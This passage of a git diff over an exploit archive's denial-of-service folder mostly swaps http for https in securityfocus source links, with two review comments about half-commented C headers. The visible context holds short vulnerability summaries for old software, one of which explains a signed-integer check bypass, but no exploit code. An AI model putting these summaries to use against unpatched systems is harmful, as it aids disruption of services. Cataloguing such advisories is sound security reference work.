@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11887/info +source: https://www.securityfocus.com/bid/11887/info A remote denial of service vulnerability reportedly affects Digital Illusions CE Codename Eagle. This issue is due to a failure of the application to properly handle exceptional network data. diff --git a/exploits/multiple/dos/25056.html b/exploits/multiple/dos/25056.html index e2c50086f..0ade4b318 100644 --- a/exploits/multiple/dos/25056.html +++ b/exploits/multiple/dos/25056.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12331/info +source: https://www.securityfocus.com/bid/12331/info Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. diff --git a/exploits/multiple/dos/25075.pl b/exploits/multiple/dos/25075.pl index 4d883b818..dbaf96f86 100755 --- a/exploits/multiple/dos/25075.pl +++ b/exploits/multiple/dos/25075.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12416/info +source: https://www.securityfocus.com/bid/12416/info Eternal Lines Web Server is reported prone to a remote denial of service vulnerability. It is reported that the issue presents itself when the web service handles 70 or more simultaneous connections from a remote host. diff --git a/exploits/multiple/dos/25081.txt b/exploits/multiple/dos/25081.txt index f42ae7570..82c719230 100644 --- a/exploits/multiple/dos/25081.txt +++ b/exploits/multiple/dos/25081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12439/info +source: https://www.securityfocus.com/bid/12439/info LANChat Pro Revival is reported prone to a remote denial of service vulnerability. It is reported that the issue presents itself when the vulnerable client processes a malformed UDP datagram. 
diff --git a/exploits/multiple/dos/25165.c b/exploits/multiple/dos/25165.c index c960d18d4..f85ba6970 100644 --- a/exploits/multiple/dos/25165.c +++ b/exploits/multiple/dos/25165.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12671/info +// source: https://www.securityfocus.com/bid/12671/info A remote buffer overflow vulnerability affects Stormy Studios KNet. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers. diff --git a/exploits/multiple/dos/25171.txt b/exploits/multiple/dos/25171.txt index b6d0e0b05..e814bf025 100644 --- a/exploits/multiple/dos/25171.txt +++ b/exploits/multiple/dos/25171.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12680/info +source: https://www.securityfocus.com/bid/12680/info Scrapland game server is reported prone to various denial of service vulnerabilities. These issues present themselves because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/25387.txt b/exploits/multiple/dos/25387.txt index 203e774bb..815ca0628 100644 --- a/exploits/multiple/dos/25387.txt +++ b/exploits/multiple/dos/25387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13124/info +source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. diff --git a/exploits/multiple/dos/25388.txt b/exploits/multiple/dos/25388.txt index 6684bcb94..7fb02839d 100644 --- a/exploits/multiple/dos/25388.txt +++ b/exploits/multiple/dos/25388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13124/info +source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. 
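Review bot: The `// source:` prefix added in the 25165.c hunk above is applied only to `.c` files, while the `.java`, `.pl` and `.html` files in this patch (24242.java, 24352.java, 25075.pl, 24778.html) keep a bare `source:` line. In 25165.c the description shown as context after the header has no comment marker either, so prefixing the one line does not make the header valid C. Either comment out the whole header block using each language's own comment syntax, or drop the prefix from this scheme-only change and handle it in a separate commit so the two edits can be reviewed independently.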
diff --git a/exploits/multiple/dos/25389.txt b/exploits/multiple/dos/25389.txt index c1756213e..a0c708fad 100644 --- a/exploits/multiple/dos/25389.txt +++ b/exploits/multiple/dos/25389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13124/info +source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. diff --git a/exploits/multiple/dos/25393.txt b/exploits/multiple/dos/25393.txt index 945aaec93..d8f71d8dd 100644 --- a/exploits/multiple/dos/25393.txt +++ b/exploits/multiple/dos/25393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13131/info +source: https://www.securityfocus.com/bid/13131/info An insecure default password disclosure vulnerability affects XAMPP. This issue is due to a failure of the application to properly secure access to default passwords. diff --git a/exploits/multiple/dos/25439.c b/exploits/multiple/dos/25439.c index 6696606e5..77f145a7a 100644 --- a/exploits/multiple/dos/25439.c +++ b/exploits/multiple/dos/25439.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13215/info +// source: https://www.securityfocus.com/bid/13215/info Multiple Vendor TCP/IP stack implementations are reported prone to a denial of service vulnerability. diff --git a/exploits/multiple/dos/25470.txt b/exploits/multiple/dos/25470.txt index 2bfefc03d..8976d95e4 100644 --- a/exploits/multiple/dos/25470.txt +++ b/exploits/multiple/dos/25470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13281/info +source: https://www.securityfocus.com/bid/13281/info Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427. diff --git a/exploits/multiple/dos/25584.txt b/exploits/multiple/dos/25584.txt index 4536e4f18..d936acc64 100644 --- a/exploits/multiple/dos/25584.txt 
+++ b/exploits/multiple/dos/25584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13463/info +source: https://www.securityfocus.com/bid/13463/info The Mtp-Target server is prone to a memory corruption vulnerability. The issue exists because a comparison fails to ensure that an integer value parameter retrieved from a client is signed. A check is made to ensure that the user-supplied value is less than 1000000 bytes. If the value passed is FFFFFFFFh, it is interpreted as a signed -1 and the check passes. The value is later used as an unsigned integer in a memory allocation operation. An allocation of 4.29 GB of data is attempted and the service crashes. diff --git a/exploits/multiple/dos/25692.txt b/exploits/multiple/dos/25692.txt index aa3801756..8cf1d6c11 100644 --- a/exploits/multiple/dos/25692.txt +++ b/exploits/multiple/dos/25692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13712/info +source: https://www.securityfocus.com/bid/13712/info Warrior Kings: Battles is susceptible to a remote denial of service vulnerability. This is due to a failure of the game server to properly handle exceptional conditions. diff --git a/exploits/multiple/dos/25757.txt b/exploits/multiple/dos/25757.txt index 09ed15fb6..a95eac67b 100644 --- a/exploits/multiple/dos/25757.txt +++ b/exploits/multiple/dos/25757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13814/info +source: https://www.securityfocus.com/bid/13814/info Stronghold 2 is affected by a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/25791.txt b/exploits/multiple/dos/25791.txt index b61e6bd47..a6193fc0f 100644 --- a/exploits/multiple/dos/25791.txt +++ b/exploits/multiple/dos/25791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13862/info +source: https://www.securityfocus.com/bid/13862/info Rakkarsoft RakNet is affected by a remote denial of service vulnerability. 
diff --git a/exploits/multiple/dos/26145.c b/exploits/multiple/dos/26145.c index 2ffbafff6..032496b7f 100644 --- a/exploits/multiple/dos/26145.c +++ b/exploits/multiple/dos/26145.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14536/info +// source: https://www.securityfocus.com/bid/14536/info Winterm 1125SE is affected by a remote denial of service vulnerability. This issue is due to the application failing to handle exceptional conditions in a proper manner. diff --git a/exploits/multiple/dos/26325.txt b/exploits/multiple/dos/26325.txt index 1c8b7fd2c..33a6eb606 100644 --- a/exploits/multiple/dos/26325.txt +++ b/exploits/multiple/dos/26325.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15015/info +source: https://www.securityfocus.com/bid/15015/info Mozilla Firefox is prone to a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/26331.txt b/exploits/multiple/dos/26331.txt index a455dbe12..e057c56d2 100644 --- a/exploits/multiple/dos/26331.txt +++ b/exploits/multiple/dos/26331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15032/info +source: https://www.securityfocus.com/bid/15032/info Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users. diff --git a/exploits/multiple/dos/26336.txt b/exploits/multiple/dos/26336.txt index 298452c03..dedf2bcb2 100644 --- a/exploits/multiple/dos/26336.txt +++ b/exploits/multiple/dos/26336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15039/info +source: https://www.securityfocus.com/bid/15039/info Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users. diff --git a/exploits/multiple/dos/26762.html b/exploits/multiple/dos/26762.html index 734760637..e3a66d7be 100644 --- a/exploits/multiple/dos/26762.html 
+++ b/exploits/multiple/dos/26762.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15773/info +source: https://www.securityfocus.com/bid/15773/info Mozilla Firefox is reportedly prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/26922.pl b/exploits/multiple/dos/26922.pl index dc0f5a87f..8d7abae3f 100755 --- a/exploits/multiple/dos/26922.pl +++ b/exploits/multiple/dos/26922.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16001/info +source: https://www.securityfocus.com/bid/16001/info Interaction SIP Proxy is susceptible to a remote denial of service vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied input data, resulting in a heap memory corruption. diff --git a/exploits/multiple/dos/26967.txt b/exploits/multiple/dos/26967.txt index 69c79bde2..4fdfad669 100644 --- a/exploits/multiple/dos/26967.txt +++ b/exploits/multiple/dos/26967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16031/info +source: https://www.securityfocus.com/bid/16031/info httprint is prone to multiple remote vulnerabilities. diff --git a/exploits/multiple/dos/27026.txt b/exploits/multiple/dos/27026.txt index fd09562e0..ef2558c7c 100644 --- a/exploits/multiple/dos/27026.txt +++ b/exploits/multiple/dos/27026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16127/info +source: https://www.securityfocus.com/bid/16127/info The Intel Graphics Accelerator driver is susceptible to a remote denial of service vulnerability. This issue is demonstrated to occur when the affected driver attempts to display an overly long text in a text area. diff --git a/exploits/multiple/dos/27094.txt b/exploits/multiple/dos/27094.txt index 6a20aeaaf..f99cbe3ca 100644 --- a/exploits/multiple/dos/27094.txt +++ b/exploits/multiple/dos/27094.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16258/info +source: https://www.securityfocus.com/bid/16258/info AmbiCom Blue Neighbors Bluetooth stack is prone to a buffer overflow vulnerability. The issue exists in the Object Push Service. diff --git a/exploits/multiple/dos/27108.txt b/exploits/multiple/dos/27108.txt index dca095883..858309087 100644 --- a/exploits/multiple/dos/27108.txt +++ b/exploits/multiple/dos/27108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16298/info +source: https://www.securityfocus.com/bid/16298/info Dual DHCP DNS Server is prone to a remote buffer overflow vulnerability. diff --git a/exploits/multiple/dos/27140.txt b/exploits/multiple/dos/27140.txt index 6a794c07d..f5a91d9de 100644 --- a/exploits/multiple/dos/27140.txt +++ b/exploits/multiple/dos/27140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16400/info +source: https://www.securityfocus.com/bid/16400/info Exiv2 is susceptible to a denial-of-service vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied input data before attempting to read it, resulting in an out-of-bounds memory access crash. diff --git a/exploits/multiple/dos/27159.txt b/exploits/multiple/dos/27159.txt index 3e3963158..14b9a11fd 100644 --- a/exploits/multiple/dos/27159.txt +++ b/exploits/multiple/dos/27159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16467/info +source: https://www.securityfocus.com/bid/16467/info Fcron is susceptible to a local buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/27171.txt b/exploits/multiple/dos/27171.txt index c8652a64f..61595a582 100644 --- a/exploits/multiple/dos/27171.txt +++ b/exploits/multiple/dos/27171.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16550/info +source: https://www.securityfocus.com/bid/16550/info Sun ONE Directory Server is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to handle malformed network traffic. diff --git a/exploits/multiple/dos/27196.txt b/exploits/multiple/dos/27196.txt index 7e7124f07..2bbe5fe83 100644 --- a/exploits/multiple/dos/27196.txt +++ b/exploits/multiple/dos/27196.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16593/info +source: https://www.securityfocus.com/bid/16593/info IBM Tivoli Directory Server is prone to an unspecified memory corruption. This issue may be triggered by malformed LDAP data. diff --git a/exploits/multiple/dos/27210.txt b/exploits/multiple/dos/27210.txt index 101065999..7e4ef497e 100644 --- a/exploits/multiple/dos/27210.txt +++ b/exploits/multiple/dos/27210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16629/info +source: https://www.securityfocus.com/bid/16629/info eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash. diff --git a/exploits/multiple/dos/27211.txt b/exploits/multiple/dos/27211.txt index 4ab6b4ce6..9a11fadbd 100644 --- a/exploits/multiple/dos/27211.txt +++ b/exploits/multiple/dos/27211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16629/info +source: https://www.securityfocus.com/bid/16629/info eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash. diff --git a/exploits/multiple/dos/27212.txt b/exploits/multiple/dos/27212.txt index 1538e5a16..6a64f2634 100644 --- a/exploits/multiple/dos/27212.txt +++ b/exploits/multiple/dos/27212.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16635/info +source: https://www.securityfocus.com/bid/16635/info Isode M-Vault Server is prone to a memory corruption. This issue may be triggered by malformed LDAP data. diff --git a/exploits/multiple/dos/27365.txt b/exploits/multiple/dos/27365.txt index 842056773..a7fb72576 100644 --- a/exploits/multiple/dos/27365.txt +++ b/exploits/multiple/dos/27365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16981/info +source: https://www.securityfocus.com/bid/16981/info The Monopd game server is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/27420.c b/exploits/multiple/dos/27420.c index 8289b04f8..703f2eae8 100644 --- a/exploits/multiple/dos/27420.c +++ b/exploits/multiple/dos/27420.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17087/info +// source: https://www.securityfocus.com/bid/17087/info ENet is prone to multiple denial-of-service vulnerabilities. A remote attacker can send specifically crafted data to trigger these flaws, leading to a denial-of-service condition. diff --git a/exploits/multiple/dos/27421.txt b/exploits/multiple/dos/27421.txt index 4c184b32b..329ea1a7a 100644 --- a/exploits/multiple/dos/27421.txt +++ b/exploits/multiple/dos/27421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17094/info +source: https://www.securityfocus.com/bid/17094/info GGZ Gaming Zone is prone to multiple remote denial-of-service vulnerabilities. These issues are due to improper input sanitization. diff --git a/exploits/multiple/dos/27460.pl b/exploits/multiple/dos/27460.pl index 95fa07d20..7ca452f80 100755 --- a/exploits/multiple/dos/27460.pl +++ b/exploits/multiple/dos/27460.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17202/info +source: https://www.securityfocus.com/bid/17202/info Various RealNetworks products are prone to multiple buffer-overflow vulnerabilities. 
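Review bot: In the .c hunks up to this point (exploits/multiple/dos/25439.c, 26145.c and 27420.c) only the `source:` line gains the `// ` prefix, while the description shown as unchanged context right after it ("Multiple Vendor TCP/IP stack implementations are reported prone to ...", "Winterm 1125SE is affected by ...", "ENet is prone to ...") is still bare prose. The header therefore ends up half comment and half text, and the visible part of it is still not valid C. Either comment the whole header block in the same commit, or keep this commit to the URL scheme change and do the comment conversion separately so each commit has a single purpose.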
diff --git a/exploits/multiple/dos/27474.txt b/exploits/multiple/dos/27474.txt index ee2bf92df..133c93636 100644 --- a/exploits/multiple/dos/27474.txt +++ b/exploits/multiple/dos/27474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17237/info +source: https://www.securityfocus.com/bid/17237/info LibVC is prone to a buffer-overflow vulnerability. This issue is due to a failure in the library to perform proper bounds checks on user-supplied data before using it in a finite-sized buffer. diff --git a/exploits/multiple/dos/27547.txt b/exploits/multiple/dos/27547.txt index c40d01c23..ea053e610 100644 --- a/exploits/multiple/dos/27547.txt +++ b/exploits/multiple/dos/27547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17340/info +source: https://www.securityfocus.com/bid/17340/info ZDaemon is prone to multiple remote vulnerabilities. diff --git a/exploits/multiple/dos/27566.txt b/exploits/multiple/dos/27566.txt index 55e95d517..ccae5f881 100644 --- a/exploits/multiple/dos/27566.txt +++ b/exploits/multiple/dos/27566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17369/info +source: https://www.securityfocus.com/bid/17369/info Doomsday is prone to multiple remote format-string vulnerabilities. diff --git a/exploits/multiple/dos/27639.txt b/exploits/multiple/dos/27639.txt index bf8b9917e..d415a1efc 100644 --- a/exploits/multiple/dos/27639.txt +++ b/exploits/multiple/dos/27639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17507/info +source: https://www.securityfocus.com/bid/17507/info W3C Amaya is susceptible to multiple remote buffer-overflow vulnerabilities. These issues are due to the application's failure to properly bounds-check user-supplied data before copying it to insufficiently sized memory buffers. diff --git a/exploits/multiple/dos/27640.txt b/exploits/multiple/dos/27640.txt index 79a5576c1..26429fafe 100644 --- a/exploits/multiple/dos/27640.txt +++ b/exploits/multiple/dos/27640.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17507/info +source: https://www.securityfocus.com/bid/17507/info W3C Amaya is susceptible to multiple remote buffer-overflow vulnerabilities. These issues are due to the application's failure to properly bounds-check user-supplied data before copying it to insufficiently sized memory buffers. diff --git a/exploits/multiple/dos/27668.c b/exploits/multiple/dos/27668.c index fc71a1674..b0591f458 100644 --- a/exploits/multiple/dos/27668.c +++ b/exploits/multiple/dos/27668.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17569/info +// source: https://www.securityfocus.com/bid/17569/info Neon Responders is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle malformed network packets. diff --git a/exploits/multiple/dos/27730.py b/exploits/multiple/dos/27730.py index b63ac5660..67cab0de9 100755 --- a/exploits/multiple/dos/27730.py +++ b/exploits/multiple/dos/27730.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17669/info +source: https://www.securityfocus.com/bid/17669/info Lotus Domino LDAP server is prone to a remote denial-of-service vulnerability when handling malformed requests. diff --git a/exploits/multiple/dos/27901.java b/exploits/multiple/dos/27901.java index fc6eca4b3..be75200c6 100644 --- a/exploits/multiple/dos/27901.java +++ b/exploits/multiple/dos/27901.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18058/info +source: https://www.securityfocus.com/bid/18058/info The Sun Java Runtime Environment is vulnerable to a denial-of-service vulnerability. This issue is due to the software's failure to handle exceptional conditions. diff --git a/exploits/multiple/dos/27915.pl b/exploits/multiple/dos/27915.pl index 593dcd741..0f6845783 100755 --- a/exploits/multiple/dos/27915.pl +++ b/exploits/multiple/dos/27915.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18138/info +source: https://www.securityfocus.com/bid/18138/info Apache James is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to efficiently handle malformed SMTP commands. diff --git a/exploits/multiple/dos/27969.c b/exploits/multiple/dos/27969.c index 12ce2a2c2..abbe8bfea 100644 --- a/exploits/multiple/dos/27969.c +++ b/exploits/multiple/dos/27969.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/18271/info +// source: https://www.securityfocus.com/bid/18271/info // // The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. // diff --git a/exploits/multiple/dos/27993.txt b/exploits/multiple/dos/27993.txt index d3deb400b..55bd57c6a 100644 --- a/exploits/multiple/dos/27993.txt +++ b/exploits/multiple/dos/27993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18329/info +source: https://www.securityfocus.com/bid/18329/info FreeType is prone to a denial-of-service vulnerability. This issue is due to a flaw in the library that causes a NULL-pointer dereference. diff --git a/exploits/multiple/dos/28065.vmx b/exploits/multiple/dos/28065.vmx index d1da60f5d..5a14e440e 100644 --- a/exploits/multiple/dos/28065.vmx +++ b/exploits/multiple/dos/28065.vmx @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18515/info +source: https://www.securityfocus.com/bid/18515/info VMware Player is susceptible to a denial-of-service vulnerability. This issue is due to the application's failure to properly handle excessively long data. diff --git a/exploits/multiple/dos/28182.java b/exploits/multiple/dos/28182.java index 4a73d924e..d00ae6da5 100644 --- a/exploits/multiple/dos/28182.java +++ b/exploits/multiple/dos/28182.java 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18869/info +source: https://www.securityfocus.com/bid/18869/info MICO is susceptible to a remote denial-of-service vulnerability. This issue is due to a failure of the application to properly handle unexpected input. diff --git a/exploits/multiple/dos/28277.txt b/exploits/multiple/dos/28277.txt index 7407135e4..78a7cde53 100644 --- a/exploits/multiple/dos/28277.txt +++ b/exploits/multiple/dos/28277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19166/info +source: https://www.securityfocus.com/bid/19166/info Opera Web Browser is prone to a memory-corruption vulnerability. diff --git a/exploits/multiple/dos/28293.txt b/exploits/multiple/dos/28293.txt index c219a9150..ddc69a6d1 100644 --- a/exploits/multiple/dos/28293.txt +++ b/exploits/multiple/dos/28293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19201/info +source: https://www.securityfocus.com/bid/19201/info Oracle 10g is reportedly prone to a integer-overflow vulnerability because the application fails to allocate a large enough data type to accommodate user-supplied input before using it in a query. This issue has not been confirmed. diff --git a/exploits/multiple/dos/28345.txt b/exploits/multiple/dos/28345.txt index 345154ccc..5df8377df 100644 --- a/exploits/multiple/dos/28345.txt +++ b/exploits/multiple/dos/28345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19370/info +source: https://www.securityfocus.com/bid/19370/info DConnect Daemon is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/28361.c b/exploits/multiple/dos/28361.c index c48d65f74..a53c405ba 100644 --- a/exploits/multiple/dos/28361.c +++ b/exploits/multiple/dos/28361.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19402/info +// source: https://www.securityfocus.com/bid/19402/info A buffer-overflow vulnerability occurs in the Festalon application because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/28491.txt b/exploits/multiple/dos/28491.txt index b1b7fd4d4..553b3d65f 100644 --- a/exploits/multiple/dos/28491.txt +++ b/exploits/multiple/dos/28491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19852/info +source: https://www.securityfocus.com/bid/19852/info Dsocks is prone to a remote buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/28542.pl b/exploits/multiple/dos/28542.pl index 4c3c5246d..889e6544e 100755 --- a/exploits/multiple/dos/28542.pl +++ b/exploits/multiple/dos/28542.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19989/info +source: https://www.securityfocus.com/bid/19989/info Verso NetPerformer Frame Relay Access Device (FRAD) is prone to a remotely exploitable buffer overflow in the telnet service. diff --git a/exploits/multiple/dos/28666.txt b/exploits/multiple/dos/28666.txt index 84c76c6a4..8d66a1ab0 100644 --- a/exploits/multiple/dos/28666.txt +++ b/exploits/multiple/dos/28666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20180/info +source: https://www.securityfocus.com/bid/20180/info Call of Duty server is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/28726.pl b/exploits/multiple/dos/28726.pl index 3f4a7cc3a..d522585bf 100755 --- a/exploits/multiple/dos/28726.pl +++ b/exploits/multiple/dos/28726.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20246/info +source: https://www.securityfocus.com/bid/20246/info OpenSSL is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/29305.txt b/exploits/multiple/dos/29305.txt index 6e148137f..5b29d6f0b 100644 --- a/exploits/multiple/dos/29305.txt +++ b/exploits/multiple/dos/29305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21714/info +source: https://www.securityfocus.com/bid/21714/info FTPRush is prone to a local buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input data to an insufficiently sized buffer. diff --git a/exploits/multiple/dos/29310.txt b/exploits/multiple/dos/29310.txt index 55551909e..17a9d2e08 100644 --- a/exploits/multiple/dos/29310.txt +++ b/exploits/multiple/dos/29310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21718/info +source: https://www.securityfocus.com/bid/21718/info WikiReader is prone to a local buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input data to an insufficiently sized buffer. diff --git a/exploits/multiple/dos/29362.pl b/exploits/multiple/dos/29362.pl index 6858c1e57..1e858ac61 100755 --- a/exploits/multiple/dos/29362.pl +++ b/exploits/multiple/dos/29362.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21791/info +source: https://www.securityfocus.com/bid/21791/info A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic. diff --git a/exploits/multiple/dos/29502.html b/exploits/multiple/dos/29502.html index fca08c4eb..478d2f47e 100644 --- a/exploits/multiple/dos/29502.html +++ b/exploits/multiple/dos/29502.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22145/info +source: https://www.securityfocus.com/bid/22145/info Transmit 3 is prone to a heap-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer. diff --git a/exploits/multiple/dos/29875.py b/exploits/multiple/dos/29875.py index 9795b37ca..627bfec5c 100755 --- a/exploits/multiple/dos/29875.py +++ b/exploits/multiple/dos/29875.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23583/info +source: https://www.securityfocus.com/bid/23583/info aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/29900.txt b/exploits/multiple/dos/29900.txt index b214ab0e4..a5d3ce42c 100644 --- a/exploits/multiple/dos/29900.txt +++ b/exploits/multiple/dos/29900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23648/info +source: https://www.securityfocus.com/bid/23648/info Asterisk is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers. diff --git a/exploits/multiple/dos/29901.txt b/exploits/multiple/dos/29901.txt index 13259a05b..4b71a79f8 100644 --- a/exploits/multiple/dos/29901.txt +++ b/exploits/multiple/dos/29901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23648/info +source: https://www.securityfocus.com/bid/23648/info Asterisk is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers. diff --git a/exploits/multiple/dos/30139.c b/exploits/multiple/dos/30139.c index 5dc302180..98762eca6 100644 --- a/exploits/multiple/dos/30139.c +++ b/exploits/multiple/dos/30139.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24284/info +// source: https://www.securityfocus.com/bid/24284/info Outpost Firewall is prone to a local denial-of-service vulnerability. diff --git a/exploits/multiple/dos/30163.html b/exploits/multiple/dos/30163.html index 82a5a4594..7d06d3894 100644 --- a/exploits/multiple/dos/30163.html +++ b/exploits/multiple/dos/30163.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24373/info +source: https://www.securityfocus.com/bid/24373/info K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer. diff --git a/exploits/multiple/dos/30187.txt b/exploits/multiple/dos/30187.txt index 5d9276d97..b0f41ade5 100644 --- a/exploits/multiple/dos/30187.txt +++ b/exploits/multiple/dos/30187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24454/info +source: https://www.securityfocus.com/bid/24454/info Mbedthis AppWeb is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/multiple/dos/30497.c b/exploits/multiple/dos/30497.c index 5b57a0cc1..e11430df4 100644 --- a/exploits/multiple/dos/30497.c +++ b/exploits/multiple/dos/30497.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25326/info +// source: https://www.securityfocus.com/bid/25326/info The Zoidcom network library is prone to a denial of service vulnerability when handling malformed packets. diff --git a/exploits/multiple/dos/30498.txt b/exploits/multiple/dos/30498.txt index 